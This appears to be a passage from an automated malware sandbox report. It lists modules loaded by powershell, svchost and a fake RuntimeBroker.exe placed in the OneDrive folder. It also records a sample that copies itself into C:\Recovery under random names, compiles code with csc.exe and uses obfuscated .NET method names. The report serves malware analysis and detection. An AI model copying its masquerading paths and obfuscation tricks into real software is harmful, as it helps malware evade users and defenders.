                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: sspicli.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: mscoree.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: kernel.appcore.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: version.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: uxtheme.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: windows.storage.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: wldp.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: profapi.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: cryptsp.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: rsaenh.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: cryptbase.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: sspicli.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exeSection loaded: sspicli.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: mscoree.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: kernel.appcore.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: version.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                            Source: Window Recorder Window detected: More than 3 window changes detected
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: EQdhBjQw4G.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: EQdhBjQw4G.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                            Source: EQdhBjQw4G.exe Static file information: File size 1719296 > 1048576
                            Source: EQdhBjQw4G.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1a3400
                            Source: EQdhBjQw4G.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.pdb source: EQdhBjQw4G.exe, 00000000.00000002.1680880366.0000000003B7D000.00000004.00000800.00020000.00000000.sdmp

                            Data Obfuscation

                            Source: EQdhBjQw4G.exe, hpJE61kMAL8Awig2KFg.cs .Net Code: Type.GetTypeFromHandle(o85UtLpraMtZAmto0dI.ae9WhwfC7SI(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(o85UtLpraMtZAmto0dI.ae9WhwfC7SI(16777245)),Type.GetTypeFromHandle(o85UtLpraMtZAmto0dI.ae9WhwfC7SI(16777259))})
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline"
                            Source: EQdhBjQw4G.exe Static PE information: section name: .text entropy: 7.4610435048156285
                            Source: RuntimeBroker.exe.0.dr Static PE information: section name: .text entropy: 7.4610435048156285
                            Source: ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe.0.dr Static PE information: section name: .text entropy: 7.4610435048156285
                            Source: ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe0.0.dr Static PE information: section name: .text entropy: 7.4610435048156285
                            Source: ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe1.0.dr Static PE information: section name: .text entropy: 7.4610435048156285
                            Source: EQdhBjQw4G.exe, zdg4PkhOt6IpnbdZGX1.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'IL7BehiJRcf', 'vsbBbBgVvD9', 'bD1XkUB27bHsR66BsKAU', 'HDBLcKB24a0eyDK5rgll', 'lmcfo0B2c85WieVZF8QX', 'Qi9TVCB28LyWLPbepyVf'
                            Source: EQdhBjQw4G.exe, iK6x8nplJYDUeXdMNSF.csHigh entropy of concatenated method names: 'VoLpucXNUG', 'MfOpQMbZrZ', 'Axdp2Sg0Bl', 'UAZpjFhUbu', 'QLcpHhNKYY', 'OXvp16FH22', 'ynrp6EbafE', 'vZUpRimlrb', 'j4kp9hKjdR', 'DPBpnVVqrG'
                            Source: EQdhBjQw4G.exe, apAIfpW2AAIE7nqvUcD.csHigh entropy of concatenated method names: 'kVQW50RsDt', 'bY3Ww20lSl', 'WJX8JaBg5kd5MCbTaQZx', 'nL7cjABgd3yIBVRPcTmS', 'TBwFZ1BgTrtxtobbtP9H', 'qCCgPFBgwPGExPybGmkV', 'LCVWauQZL7', 'HsYtpyBgaIEUvVC62ySV', 'iDjwbBBgXYwMluXujgxC', 'H21SlyBgsNoQaKEl1ExT'
                            Source: EQdhBjQw4G.exe, qsKI1XBCCmeXlUAqm2Q.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'NGiBeB4RyJL', 'vsbBbBgVvD9', 'lmG2eqBtzPa3PeV8Rapp', 'ni6VYxBgFkH4bMhdBJq1', 'fL9yHtBgBwKbmBmLmM4T', 'LnvCxsBgW28sTNiCSLuH'
                            Source: EQdhBjQw4G.exe, t9D1HoV9py79ppWYIty.csHigh entropy of concatenated method names: 'BQXBeKoZRbu', 'UfJBG8GeVsn', 'rsEfIoBkrU48V60Pq6XR', 'v7yYYfBkNGSlWTpPaXXJ', 'CLUdeGBkYmSiZG2pgKHX', 'ounHgtBkMBSxqNRRstZ9', 'D7ZSL3BkUgHg92wIEhcQ', 'lveDxFBkiwrMlPITWs8j', 'uDGeSRBklwqB5lOtMEDw', 'imethod_0'
                            Source: EQdhBjQw4G.exe, eKPdhSK2vF5JmSfD0At.csHigh entropy of concatenated method names: 'method_0', 'HyPKHbwU7T', 'R0NK1a4kCm', 'z8YK6jc9vN', 'kRkKRmGsZL', 'u9UK9RDHjB', 'chqKnjgqBJ', 'gLIhioBmuXoidRXgqPU4', 'ebTc2oBmtFnXQKkNDdX3', 'QDMVrUBmgLYR7YsLLpol'
                            Source: EQdhBjQw4G.exe, rIDODOjSC2BqYJUV8EY.csHigh entropy of concatenated method names: 'PL4Hrg0ewf', 'AuZvc4Bxq7SkU02T0BTf', 'KuYJo3BxpP7hHGSBjnVU', 'JDjQcgBxC1WCbLk0Yhqe', 'kt5', 'zRKj7tEdJy', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite'
                            Source: EQdhBjQw4G.exe, fXp7lqG5b1419J0hlcb.csHigh entropy of concatenated method names: 'eYwG34kLX6', 'AikGkpAKmi', 'fhTGqjLURt', 'F9KTkRBHOsrYOASqprXr', 'YHT25yBHAp0yu5PYHmdu', 'iC44MIBHEELEkBLuZqwX', 'Sr9S5cBHeuboLQhR9Lfb', 'RhYGy9xEpn', 'usDGsZeM7R', 'bHEGmAKKgg'
                            Source: EQdhBjQw4G.exe, zHtZF1etB8Yi7MPQT6H.csHigh entropy of concatenated method names: 'bCTeuMpWdF', 'bAHeQyX0gP', 'XFSe2mecvr', 'gd1ej3DBwe', 'DTOeH0oj69', 'BoRe1CIgTH', 'Xb7ETKB13JlEll6EHmp0', 'lpSqgaB1kHCsbyIg7Zs0', 'aharu8B1qIyKrVYwTVX8', 'ygc6q5B1p1iV9H3UkL4Z'
                            Source: EQdhBjQw4G.exe, jJiAf1toa8x8xy1AQV0.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'xymthtALHf', 'Write', 'h4qtG2jxXN', 'fLFtEtGgNX', 'Flush', 'vl7'
                            Source: EQdhBjQw4G.exe, LmLrE9hyXmNT5PPn4aC.csHigh entropy of concatenated method names: 'hxIhPtMb5F', 'Soe4nRBjOdFkVGa2lqnF', 's9va2hBjEcQYsOqDKiOX', 'eqOq60BjeCDu81rhCS3C', 'PSJDAgBjAayASIt7x3WG', 'vN1opWBjvYjwtYQDEsvs', 'U1J', 'P9X', 'KEXBbU8KOAi', 'qCaBbi4S71Q'
